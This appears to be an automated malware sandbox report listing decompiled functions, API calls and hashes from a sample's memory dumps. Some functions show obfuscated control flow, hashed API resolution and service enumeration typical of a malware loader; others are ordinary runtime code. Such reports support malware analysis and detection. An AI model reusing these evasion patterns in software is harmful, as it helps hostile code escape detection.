Opcode Fuzzy Hash: bbcbf0c1e1b444e7bcc24bf6de6306a89232d200df8180b8d6ea5dc5382159ee
Instruction Fuzzy Hash: C551E572BC46019BCF28AAB4AC4467B76E6ABD0354F140DDDE977CB240EB35C8848793

Uniqueness

Uniqueness Score: -1.00%

Function 021E5070, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E021E5070(void* __ecx, short** __edx) {
				char _v4;
				char _v8;
				short** _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				signed int _v56;
				intOrPtr _v68;
				void* __ebx;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t23;
				void* _t26;
				void* _t30;
				void* _t34;
				void* _t37;
				void* _t38;
				void* _t39;
				signed int _t40;
				void* _t48;
				short** _t81;
				void* _t83;
				signed int _t84;
				void* _t85;
				void* _t90;
				void* _t93;
				void* _t94;

				_v12 = __edx;
				_t48 = 0;
				_t81 = _v12;
				_t90 = 0;
				_v20 = __ecx;
				_t84 = 0x200c4c64;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t93 = _t84 - 0x200c4c64;
						if(_t93 > 0) {
							break;
						}
						if(_t93 == 0) {
							_t84 = 0xbb9a688;
							continue;
						} else {
							_t94 = _t84 - 0xc62322e;
							if(_t94 > 0) {
								__eflags = _t84 - 0xd366d74;
								if(_t84 == 0xd366d74) {
									_t81 =  &(_t81[0xb]);
									__eflags = _t81 - _t16;
									asm("sbb esi, esi");
									_t84 = (_t84 & 0x1131a8a6) + 0x18b16b79;
									continue;
								} else {
									__eflags = _t84 - 0x18b16b79;
									if(_t84 != 0x18b16b79) {
										goto L39;
									} else {
										E021E4250(_t48, _t90);
										_t84 = 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									}
								}
							} else {
								if(_t94 == 0) {
									_t37 =  *0x21edb9c;
									__eflags = _t37;
									if(_t37 == 0) {
										_t37 = E021E3E80(_t48, E021E3F20(0x667fdee), 0x72841a68, _t90);
										 *0x21edb9c = _t37;
									}
									_t38 =  *_t37(_v20, 0, 0x30, 3, _t48, 0x20000,  &_v8,  &_v16, 0, 0);
									__eflags = _t38;
									if(_t38 == 0) {
										L29:
										_t84 = 0x18b16b79;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										_t39 =  *0x21edd4c;
										__eflags = _t39;
										if(_t39 == 0) {
											_t39 = E021E3E80(_t48, E021E3F20(0xbb398380), 0xae3c1a47, _t90);
											 *0x21edd4c = _t39;
										}
										_t40 =  *_t39();
										_t84 = 0x29e3141f;
										_t83 = (_t40 & 0x0000001f) * 0x2c + _t48;
										_t16 = _v56 * 0x2c + _t48;
										__eflags = _t83 - _t16;
										_v68 = _t16;
										_t81 =  >=  ? _t48 : _t83;
										continue;
									}
									L47:
								} else {
									if(_t84 == 0xc9d2df) {
										_t90 = E021E42F0(_t48, 0x2000);
										__eflags = _t90;
										_t84 =  !=  ? 0xc62322e : 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										if(_t84 != 0xbb9a688) {
											L39:
											__eflags = _t84 - 0x230370fe;
											if(_t84 != 0x230370fe) {
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										} else {
											_t16 = E021E42F0(_t48, 0x20000);
											_t48 = _t16;
											if(_t48 != 0) {
												_t84 = 0xc9d2df;
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L46:
						return _t16;
						goto L47;
					}
					__eflags = _t84 - 0x3024435d;
					if(__eflags > 0) {
						__eflags = _t84 - 0x34957300;
						if(_t84 == 0x34957300) {
							_t17 =  *0x21edea8;
							__eflags = _t17;
							if(_t17 == 0) {
								_t17 = E021E3E80(_t48, E021E3F20(0xbb398380), 0x97f883e, _t90);
								 *0x21edea8 = _t17;
							}
							_t85 =  *_t17();
							_t19 =  *0x21ee1a0;
							__eflags = _t19;
							if(_t19 == 0) {
								_t19 = E021E3E80(_t48, E021E3F20(0xbb398380), 0x26c3f343, _t90);
								 *0x21ee1a0 = _t19;
							}
							return  *_t19(_t85, 0, _t48);
						}
						goto L39;
					} else {
						if(__eflags == 0) {
							_t23 =  *0x21edd1c;
							__eflags = _t23;
							if(_t23 == 0) {
								_t23 = E021E3E80(_t48, E021E3F20(0x667fdee), 0xe8428d8f, _t90);
								 *0x21edd1c = _t23;
							}
							 *_t23(_v24, 1, _t90, 0x2000,  &_v4);
							asm("sbb esi, esi");
							_t26 =  *0x21eddb8;
							_t84 = (_t84 & 0x1dde7ce2) + 0xd366d74;
							__eflags = _t26;
							if(_t26 == 0) {
								_t26 = E021E3E80(_t48, E021E3F20(0x667fdee), 0x505cb3fe, _t90);
								 *0x21eddb8 = _t26;
							}
							_t16 =  *_t26(_v44);
							goto L39;
						} else {
							__eflags = _t84 - 0x29e3141f;
							if(_t84 == 0x29e3141f) {
								__eflags =  *0x21edab4;
								if( *0x21edab4 == 0) {
									 *0x21edab4 = E021E3E80(_t48, E021E3F20(0x667fdee), 0x203166f7, _t90);
								}
								_t30 = OpenServiceW(_v20,  *_t81, 1); // executed
								__eflags = _t30;
								_v24 = _t30;
								_t84 =  !=  ? 0x3024435d : 0xd366d74;
								continue;
							} else {
								__eflags = _t84 - 0x2b14ea56;
								if(_t84 != 0x2b14ea56) {
									goto L39;
								} else {
									_t34 =  *0x21edcf0;
									__eflags = _t34;
									if(_t34 == 0) {
										_t34 = E021E3E80(_t48, E021E3F20(0x667fdee), 0x60075e37, _t90);
										 *0x21edcf0 = _t34;
									}
									 *_t34(_v12, 1, _t90);
									goto L29;
								}
							}
						}
					}
					goto L46;
				}
			}

0x021e5076
0x021e507a
0x021e507d
0x021e5081
0x021e5083
0x021e5087
0x021e508c
0x021e508c
0x021e5090
0x021e5090
0x021e5090
0x021e5096
0x00000000
0x00000000
0x021e509c
0x021e51cd
0x00000000
0x021e50a2
0x021e50a2
0x021e50a8
0x021e5190
0x021e5196
0x021e51b5
0x021e51b8
0x021e51ba
0x021e51c2
0x00000000
0x021e5198
0x021e5198
0x021e519e
0x00000000
0x021e51a4
0x021e51a6
0x021e51ab
0x021e508c
0x021e508c
0x00000000
0x021e508c
0x021e508c
0x021e519e
0x021e50ae
0x021e50ae
0x021e50fc
0x021e5101
0x021e5103
0x021e5116
0x021e511b
0x021e511b
0x021e513e
0x021e5140
0x021e5142
0x021e522a
0x021e522a
0x021e508c
0x021e508c
0x00000000
0x021e508c
0x021e5148
0x021e5148
0x021e514d
0x021e514f
0x021e5162
0x021e5167
0x021e5167
0x021e516c
0x021e5171
0x021e517e
0x021e5180
0x021e5182
0x021e5184
0x021e5188
0x00000000
0x021e5188
0x00000000
0x021e50b0
0x021e50b6
0x021e50e9
0x021e50f0
0x021e50f7
0x021e508c
0x021e508c
0x00000000
0x021e508c
0x021e50b8
0x021e50be
0x021e52f5
0x021e52f5
0x021e52fb
0x021e508c
0x021e508c
0x00000000
0x021e508c
0x021e508c
0x021e50c4
0x021e50c9
0x021e50ce
0x021e50d2
0x021e50d8
0x021e508c
0x021e508c
0x00000000
0x021e508c
0x021e508c
0x021e50d2
0x021e50be
0x021e50b6
0x021e50ae
0x021e50a8
0x021e535b
0x021e535b
0x00000000
0x021e535b
0x021e51d7
0x021e51dd
0x021e52ed
0x021e52f3
0x021e5302
0x021e5307
0x021e5309
0x021e531c
0x021e5321
0x021e5321
0x021e5328
0x021e532a
0x021e532f
0x021e5331
0x021e5344
0x021e5349
0x021e5349
0x00000000
0x021e5352
0x00000000
0x021e51e3
0x021e51e3
0x021e527a
0x021e527f
0x021e5281
0x021e5294
0x021e5299
0x021e5299
0x021e52af
0x021e52b3
0x021e52b5
0x021e52c0
0x021e52c6
0x021e52c8
0x021e52db
0x021e52e0
0x021e52e0
0x021e52e9
0x00000000
0x021e51e9
0x021e51e9
0x021e51ef
0x021e5239
0x021e523b
0x021e5253
0x021e5253
0x021e5260
0x021e5262
0x021e5264
0x021e5272
0x00000000
0x021e51f1
0x021e51f1
0x021e51f7
0x00000000
0x021e51fd
0x021e51fd
0x021e5202
0x021e5204
0x021e5217
0x021e521c
0x021e521c
0x021e5228
0x00000000
0x021e5228
0x021e51f7
0x021e51ef
0x021e51e3
0x00000000
0x021e51dd

APIs

OpenServiceW.ADVAPI32(?,?,00000001,00000000,?,?,00000000,?,?,?,?,?,?,021E890D), ref: 021E5260

Strings

tm6, xrefs: 021E5268
]C$0, xrefs: 021E51D7
tm6, xrefs: 021E5190
]C$0, xrefs: 021E526D

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ]C$0$]C$0$tm6$tm6
API String ID: 3098006287-1577568632
Opcode ID: e1c0154c6b8310d8e131a5b38ce7956ba50614f3903068852ab716bc57f84269
Instruction ID: 916a552b8a6ab186d740f5a0f5e660eebaf77c653320f06c6bda917293e4b1a6
Opcode Fuzzy Hash: e1c0154c6b8310d8e131a5b38ce7956ba50614f3903068852ab716bc57f84269
Instruction Fuzzy Hash: 8B61C732B80A11EBDF146BB8AC9073F72E7A78464CF5504A9E9139F254EB608D408BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00425FF1, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00425FF1() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x439be0;
				_t18 = GetVersion();
				 *0x00439C34 = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x00439C38 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x00439C3C = _t19;
				 *0x00439C40 = _t40 - _t19;
				 *0x00439C44 = _t19;
				 *0x00439C48 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x439c48)) = _t28 + 1;
				}
				E004171BC(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E00417178(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}

0x00426066
0x00426068
0x0042607f
0x00426089
0x0042608c
0x0042608e
0x0042608f
0x00426096
0x00426099
0x0042609c
0x0042609f
0x004260a2
0x004260a5
0x004260b0
0x004260b3
0x004260b3
0x004260b8
0x004260bf
0x004260c2
0x004260db
0x004260e0
0x004260e8
0x004260eb
0x004260f2
0x004260f3
0x004260f6
0x004260fd

APIs

GetVersion.KERNEL32(?,?,?,00425FEC), ref: 00426068
GetProcessVersion.KERNELBASE(00000000,?,?,?,00425FEC), ref: 004260A5
LoadCursorA.USER32 ref: 004260D3
LoadCursorA.USER32 ref: 004260DE

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction ID: b544fc3fc140862069c0e5c3025fa315675d99968a939774a25cb551b1266f67
Opcode Fuzzy Hash: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction Fuzzy Hash: 2C113AB1A047608FD728DF3A989452ABBE5FB48704751493FE18BC6B50D778A441CB98

Uniqueness

Uniqueness Score: -1.00%

Function 021E8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E021E8240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x21edfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E021E3F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E021E3E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x21edfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x21ede58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E021E3F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E021E3E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x21ede58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E021EB590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x21edfbc == 0) {
										_t101 = E021E3F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x21edfbc = E021E3E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x21ee1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E021E3F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E021E3E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x21ee1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x21edc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E021E3F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E021E3E80(_t112, _t108, 0x560d239b, _t145);
							 *0x21edc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x021e8240
0x021e8240
0x021e8246
0x021e824e
0x021e825d
0x021e8262
0x021e8266
0x021e826e
0x021e8276
0x021e827e
0x021e8290
0x021e8294
0x021e829c
0x021e82a4
0x021e82ae
0x021e82b7
0x021e82bc
0x021e82c4
0x021e82cc
0x021e82d1
0x021e82d9
0x021e82e1
0x021e82e9
0x021e82f1
0x021e82f7
0x021e8309
0x021e830d
0x021e8315
0x021e8323
0x021e8326
0x021e832a
0x021e8332
0x021e8332
0x021e8332
0x021e8338
0x00000000
0x00000000
0x021e833e
0x021e83fc
0x021e8401
0x021e8403
0x021e840a
0x021e840f
0x021e8416
0x021e841b
0x021e841b
0x021e8425
0x021e8427
0x00000000
0x021e8344
0x021e834a
0x021e83c0
0x021e83c5
0x021e83c7
0x021e83ce
0x021e83d3
0x021e83da
0x021e83df
0x021e83df
0x021e83f0
0x021e83f2
0x00000000
0x021e834c
0x021e8352
0x021e84cf
0x021e84d7
0x021e84f7
0x021e84fb
0x021e8503
0x021e8507
0x021e850b
0x021e8513
0x021e8515
0x00000000
0x021e8517
0x021e8517
0x021e851e
0x021e852a
0x021e8519
0x021e8519
0x021e851b
0x00000000
0x00000000
0x00000000
0x00000000
0x021e851b
0x021e8517
0x021e8358
0x021e835e
0x021e84ac
0x021e84ac
0x021e84b2
0x00000000
0x00000000
0x00000000
0x00000000
0x021e8364
0x021e836c
0x021e8373
0x021e8378
0x021e8386
0x021e8386
0x021e83a9
0x021e83ab
0x021e83b0
0x021e84b8
0x021e84b8
0x021e84c2
0x021e83b6
0x021e83b6
0x00000000
0x021e83b6
0x021e83b0
0x021e835e
0x021e8352
0x021e834a
0x00000000
0x021e833e
0x021e8431
0x021e8437
0x021e84c3
0x00000000
0x021e843d
0x021e843d
0x021e8443
0x021e8445
0x021e844a
0x021e844c
0x021e8453
0x021e8458
0x021e845f
0x021e8464
0x021e8464
0x021e8473
0x021e8477
0x021e8479
0x021e8484
0x021e848a
0x021e848c
0x021e8493
0x021e8498
0x021e849f
0x021e84a4
0x021e84a4
0x021e84aa
0x021e84aa
0x00000000
0x021e8443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 021E83A9

Strings

J, xrefs: 021E82D9

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: ef5c314f08cba26c830662a036eb6029addeec40bdab71eb9db2059744104ddd
Instruction ID: 30b3eeeca0e82b20c313454a7d28ca9262381927f3bb66cf172af50fb77350ec
Opcode Fuzzy Hash: ef5c314f08cba26c830662a036eb6029addeec40bdab71eb9db2059744104ddd
Instruction Fuzzy Hash: 0E61C032A847019FCB18EF68DC84A2FB7E5ABC4754F05491DF4A69B2A0D774C9098F83

Uniqueness

Uniqueness Score: -1.00%

Function 021E42F0, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E021E42F0(void* __ebx, long __ecx) {
				intOrPtr* _t1;
				void* _t4;
				void* _t16;
				long _t17;
				void* _t18;

				_t8 = __ebx;
				_t1 =  *0x21edea8;
				_t17 = __ecx;
				if(_t1 == 0) {
					_t1 = E021E3E80(__ebx, E021E3F20(0xbb398380), 0x97f883e, _t18);
					 *0x21edea8 = _t1;
				}
				_t16 =  *_t1();
				if( *0x21edcec == 0) {
					 *0x21edcec = E021E3E80(_t8, E021E3F20(0xbb398380), 0xe9233692, _t18);
				}
				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
				return _t4;
			}

0x021e42f0
0x021e42f0
0x021e42f6
0x021e42fb
0x021e430e
0x021e4313
0x021e4313
0x021e431a
0x021e4323
0x021e433b
0x021e433b
0x021e4344
0x021e4348

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 021E4344

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 42146f8b87cf898a7d44a4517e73544dc3c6034dc3ec1fe3aeb54dc757720641
Instruction ID: 81df44c15ff4a7a729ccc7cf4288c24e5d6810c7a09a3b6e705bc867681f2250
Opcode Fuzzy Hash: 42146f8b87cf898a7d44a4517e73544dc3c6034dc3ec1fe3aeb54dc757720641
Instruction Fuzzy Hash: 9AE03966B81611AE9F14B6F5BC54A7B22EFABC068031488A9F413CF344EF609C414BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00409C36, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409C36() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00409BF0); // executed
				 *0x439edc = _t1;
				return _t1;
			}

0x00409c3b
0x00409c41
0x00409c46

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00009BF0), ref: 00409C3B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction ID: b3cfb7864018c3ddb187660085869e9baaa6efe3d8831d09aec10079f1b62131
Opcode Fuzzy Hash: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction Fuzzy Hash: BCA022B02003808FCB20AF20BC3A0203B30F2003A23000032E000802F2EBF02880EF0C

Uniqueness

Uniqueness Score: -1.00%

Function 0042592B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042592B() {
				void* __ecx;
				void* __ebp;
				struct _CRITICAL_SECTION* _t36;
				void* _t37;
				struct _CRITICAL_SECTION* _t42;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x4399c8
				_t36 = _t1;
				 *(_t74 + 0x14) = _t36;
				EnterCriticalSection(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x4
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0x4b0100
						_t37 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t37 != 0) {
							_t61 = GlobalHandle(_t37);
							GlobalUnlock(_t61);
							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t42;
						if(_t42 == 0) {
							_t15 = _t71 + 0x10; // 0x4b0100
							GlobalLock(GlobalHandle( *_t15));
							_t16 = _t74 + 0x14; // 0x406468
							LeaveCriticalSection( *_t16);
							E0041007F(_t65);
						}
						_t63 = GlobalLock( *(_t74 + 0x10));
						_t18 = _t71 + 4; // 0x20
						E00406330(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0x4b0100
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0x4b0100
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x4
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x5
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0x4b0100
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x5
				 *(_t71 + 8) = _t34;
				LeaveCriticalSection( *(_t74 + 0x10));
				return _t70;
			}

0x0042592f
0x00425932
0x00425932
0x00425936
0x0042593a
0x00425940
0x00425940
0x00425943
0x00425943
0x00425948
0x00425957
0x00425959
0x0042595c
0x00425979
0x00425979
0x00425979
0x0042597c
0x00425982
0x0042599e
0x004259a1
0x004259b3
0x00425984
0x0042598f
0x0042598f
0x004259bf
0x004259c5
0x004259c7
0x004259d1
0x004259d3
0x004259d7
0x004259dd
0x004259dd
0x004259e8
0x004259ea
0x00425a01
0x00425a06
0x00425a09
0x00425a0c
0x0042595e
0x0042595e
0x00425961
0x00425964
0x00425969
0x0042596a
0x0042596f
0x00000000
0x00000000
0x00000000
0x0042596f
0x00425973
0x00000000
0x00000000
0x00425973
0x0042594a
0x0042594a
0x00425951
0x00000000
0x00000000
0x00425951
0x00425a10
0x00425a13
0x00425a15
0x00425a18
0x00425a18
0x00425a1b
0x00425a1e
0x00425a29
0x00425a2c
0x00425a2f
0x00425a3c

APIs

EnterCriticalSection.KERNEL32(004399C8,004397CC,00000000,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042593A
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042598F
GlobalHandle.KERNEL32(004B0100), ref: 00425998
GlobalUnlock.KERNEL32(00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259A1
GlobalReAlloc.KERNEL32 ref: 004259B3
GlobalHandle.KERNEL32(004B0100), ref: 004259CA
GlobalLock.KERNEL32 ref: 004259D1
LeaveCriticalSection.KERNEL32(hd@,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259D7
GlobalLock.KERNEL32 ref: 004259E6
LeaveCriticalSection.KERNEL32(?), ref: 00425A2F

Strings

hd@, xrefs: 004259D3

Memory Dump Source

